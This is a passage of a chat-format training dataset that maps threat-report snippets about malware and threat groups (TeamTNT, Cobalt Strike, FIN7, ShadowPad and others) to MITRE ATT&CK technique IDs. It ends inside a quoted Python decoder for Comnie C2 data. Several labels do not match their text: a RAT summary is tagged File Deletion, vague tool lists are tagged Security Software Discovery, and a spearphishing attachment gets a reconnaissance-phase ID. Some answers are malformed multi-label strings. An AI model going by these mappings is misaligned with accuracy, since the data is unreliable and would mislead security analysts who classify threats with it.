dependencies. Conclusion . AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerPunch can use Base64-encoded scripts." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Volgmer variant is encoded using a simple XOR cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can download a hosted \"beacon\" payload using BITSAdmin." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to send collected files over its C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can set persistence with a Registry run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it \"FINcoding. These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has discovered system information including memory status, CPU frequency, OS versions, and volume serial numbers." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process." }, { "role": "assistant", "content": "T1055.011 - Process Injection: Extra Window Memory Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has executed the \"tasklist\" command." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has targeted victims using spearphishing emails with malicious Microsoft Word attachments." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The legitimate application is a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations. When the Kaspersky application is run, it loads a file named msi.dll, which is located within the same directory. The XOR-decode process, which skips zeroes, uses the single-byte key 0x88" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats used various implants, including those built with JS, on target machines." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SYSCON has the ability to use Tasklist to list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This file is a USB file stealer which can be also guessed by its internal name \"USBgrabber.dll\". However, the implementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB drive was connected" }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can enumerate files and directories just prior to encryption." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros. When the file is opened, it loads in Microsoft Excel and urges the user to enable macros" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CVE-2018-4878 was the second most commonly observed vulnerability and is the only Adobe Flash Player vulnerability on this year’s top 10. Like CVE-2018-8174, this vulnerability was included in multiple exploit kits, most notably the Fallout exploit kit, which was used to distribute GandCrab ransomware. Fallout took its name and URI patterns from the now defunct Nuclear exploit kit, which had been associated with CVE-2015-7645, one of 2016’s top 10 vulnerabilities. In 2018, Fallout was last selling for $300 a week and $1,100 a month, as seen below." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution', 'T1588.005 - Exploits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nomadic Octopus executed PowerShell in a hidden window." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format)." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The prior example decrypts to the following: mailto:121.126.211[.]94:8080;80;80   The following Python script may be used to decode the C2 data used by the newest Comnie variant: 12345678910111213141516171819202122232425262728293031323334353637383940 import base64import sysimport refrom string import maketransfrom struct import *import requestsdef rc4_crypt(data, key):  S = range(256)  j = 0  out = []  for i in range(256):    j = (j + S[i] + ord( key[i % len(key)] )) % 256    S[i] , S[j] = S[j] , S[i]  i = j = 0  for char in data:    i = ( i + 1 ) % 256    j = ( j + S[i] ) % 256    S[i] , S[j] = S[j] , S[i]    out.append(chr(ord(char) ^ S[(S[j] + S[i]) % 256]))  return ''.join(out)def decode(data):  o = \"\"  for d in data:    od = ord(d)    o += chr((4 * (16 * od | od & 0xC) | (((od >> 4 | od & 0x30) >> 2))) & 0xFF)  return obase64fixTable = maketrans(\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"[::-1], \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\");def trans(string):  return str(string).translate(base64fixTable)def altdecode(string):  return base64.b64decode(trans(string))req = requests.get(sys.argv[1])fd = req.textoriginal_data = re.search(\"magnet:/\\?([^\\?]+)\\?\", fd).group(1)parsed_data = altdecode(original_data)dataLength = unpack(\"